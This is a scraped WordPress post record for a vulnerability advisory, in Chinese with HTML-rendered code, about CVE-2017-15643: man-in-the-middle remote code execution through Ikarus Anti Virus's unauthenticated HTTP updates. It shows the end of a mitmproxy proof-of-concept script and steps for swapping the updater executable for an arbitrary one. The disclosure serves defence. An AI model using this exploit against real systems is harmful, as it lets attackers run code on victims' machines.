crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-96\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reply<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status_code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-97\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">already_patched<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-98\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">reply<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-99\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-100\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-101\"><span class=\"crayon-v\">config<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">proxy<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ProxyConfig<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">8080<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mode<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;transparent&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-102\"><span class=\"crayon-v\">server<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ProxyServer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">config<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f5d60531148303101-103\"><span class=\"crayon-v\">m<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">IkarusPOC<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f5d60531148303101-104\"><span class=\"crayon-v\">m<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">run<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0128 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3542\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 27 Nov 2017 07:50:39 +0000<\/strong><\/p>\n<p>\u6f0f\u6d1e\u6982\u8981 \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728Ikraus Anti Virus 2.16.7\u4e2d\u53d1\u73b0\u7684\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002 KARUS anti.virus\u201c\u53ef\u4ee5\u4fdd\u62a4\u4f60\u7684\u4e2a\u4eba\u6570\u636e\u548cPC\u514d\u53d7\u5404\u79cd\u6076\u610f\u8f6f\u4ef6\u7684\u5165\u4fb5\u3002\u6b64\u5916\uff0c\u53cd\u5783\u573e\u90ae\u4ef6\u6a21\u5757\u53ef\u4ee5\u4fdd\u62a4\u7528\u6237\u514d\u53d7\u5783\u573e\u90ae\u4ef6\u548c\u7535\u5b50\u90ae\u4ef6\u4e2d\u7684\u6076\u610f\u8f6f\u4ef6\u653b\u51fb\u3002 \u9009\u62e9\u83b7\u5956\u7684IKARUS\u626b\u63cf\u5f15\u64ce\uff0c\u53ef\u4ee5\u6709\u6548\u4fdd\u62a4\u81ea\u5df1\u514d\u53d7\u7f51\u7edc\u72af\u7f6a\u5206\u5b50\u7684\u4fb5\u5bb3\u3002 IKARUS\u662f\u4e16\u754c\u4e0a\u6700\u597d\u7684\u626b\u63cf\u5f15\u64ce\uff0c\u5b83\u6bcf\u5929\u90fd\u5728\u68c0\u6d4b\u672a\u77e5\u548c\u5df2\u77e5\u7684\u5a01\u80c1\u3002 \u6f0f\u6d1e\u63d0\u4ea4\u8005 \u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u4eba\u5458\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e \u5382\u5546\u54cd\u5e94 \u66f4\u65b0\u4e00 CVE: CVE-2017-15643 \u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u8fd9\u4e9b\u6f0f\u6d1e\u7684\u8865\u4e01\u3002\u83b7\u53d6\u66f4\u591a\u4fe1\u606f\uff1a https:\/\/www.ikarussecurity.com\/about-ikarus\/security-blog\/vulnerability-in-windows-antivirus-products-ik-sa-2017-0001\/ \u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f \u7f51\u7edc\u653b\u51fb\u8005\uff08\u4e2d\u95f4\u4eba\u653b\u51fb\uff09\u53ef\u4ee5\u5728\u8fd0\u884cIkraus\u53cd\u75c5\u6bd2\u8f6f\u4ef6\u7684\u8ba1\u7b97\u673a\u4e0a\u5b9e\u73b0\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002 Windows\u7248\u7684Ikarus AV\u4f7f\u7528\u660e\u6587HTTP\u548cCRC32\u6821\u9a8c\u8fdb\u884c\u66f4\u65b0\uff0c\u4ee5\u53ca\u7528\u4e8e\u9a8c\u8bc1\u4e0b\u8f7d\u6587\u4ef6\u7684\u4e00\u4e2a\u66f4\u65b0\u503c\u3002 \u53e6\u5916\uff0cikarus\u68c0\u67e5\u66f4\u65b0\u7248\u672c\u53f7\uff0c\u901a\u8fc7\u589e\u52a0\u66f4\u65b0\u7684\u7248\u672c\u53f7\uff0c\u4ee5\u63a8\u52a8\u66f4\u65b0\u8fdb\u7a0b\u8fdb\u884c\u66f4\u65b0\u3002 \u5728ikarus\u4e2d\u6267\u884c\u66f4\u65b0\u7684\u53ef\u6267\u884c\u6587\u4ef6\u662fguardxup.exe guardxup.exe\uff0c\u901a\u8fc7\u7aef\u53e380\uff0c\u53d1\u9001\u66f4\u65b0\u8bf7\u6c42\u5982\u4e0b\uff1a [crayon-5a1c8f5b8564c832670696\/] \u670d\u52a1\u5668\u54cd\u5e94\u5982\u4e0b\uff1a [crayon-5a1c8f5b85655113594378\/] \u901a\u8fc7\u4ee3\u7406\uff0c\u6211\u4eec\u53ef\u4ee5\u4fee\u6539\u54cd\u5e94\uff0c\u5c06\u201cupdate\u201d\u503c\u52a01\uff0c\u5e76\u5c06\u54cd\u5e94\u8f6c\u53d1\u7ed9\u5ba2\u6237\u7aef\u3002 \u7136\u540e\uff0c\u5ba2\u6237\u7aef\u5c06\u901a\u8fc7\u6b64URL\u8bf7\u6c42\u66f4\u65b0\uff1ahttp:\/\/mirror04.ikarus.at\/updates\/guardxup001005048.full ikarus\u670d\u52a1\u5668\u5c06\u8fd4\u56de404\uff1a [crayon-5a1c8f5b8565a461056357\/] \u4f46\u6211\u4eec\u53ef\u4ee5\u7528IKUP\u683c\u5f0f\u4fee\u6539\u4e0a\u8ff0\u54cd\u5e94\uff1a [crayon-5a1c8f5b8565f465486246\/] \u7136\u540e\uff0c\u6211\u4eec\u5c06\u4fee\u6539\u8fc7\u540e\u7684\u54cd\u5e94\u8f6c\u53d1\u5230\u5ba2\u6237\u7aef\uff0c\u5728\u90a3\u91cc\u7528\u6211\u4eec\u7684\u53ef\u6267\u884c\u6587\u4ef6\u66ff\u6362guardxup.exe\u3002 \u6f0f\u6d1e\u8bc1\u660e \u5b89\u88c5mitmproxy 0.17 &#8211; pip install mitmproxy == 0.17 \u8981\u4f7f\u7528\u8fd9\u4e2a\u811a\u672c\uff0c\u5728\u900f\u660e\u4ee3\u7406\u6a21\u5f0f\u4e0b\uff0c\u901a\u8fc7\u4e2d\u95f4\u4eba80\u7aef\u53e3\u8f6c\u53d1\u5ba2\u6237\u7aef\u7684\u901a\u4fe1\u6d41\u91cf\u3002 \u8bbe\u7f6e\u4f60\u7684\u9632\u706b\u5899\u89c4\u5219\u4ee5\u62e6\u622a8080\u7aef\u53e3\u4e0a\u7684\u901a\u4fe1\u6d41\u91cf\uff1a [crayon-5a1c8f5b85664388983146\/] \u7136\u540e\u6267\u884c\u5982\u4e0b\u811a\u672c\uff1a .\/poc.py file_to_deploy.exe [crayon-5a1c8f5b85668324361117\/]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,11682,10757,12136],"class_list":["post-10623","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10623","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10623"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10623\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10623"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10623"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10623"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}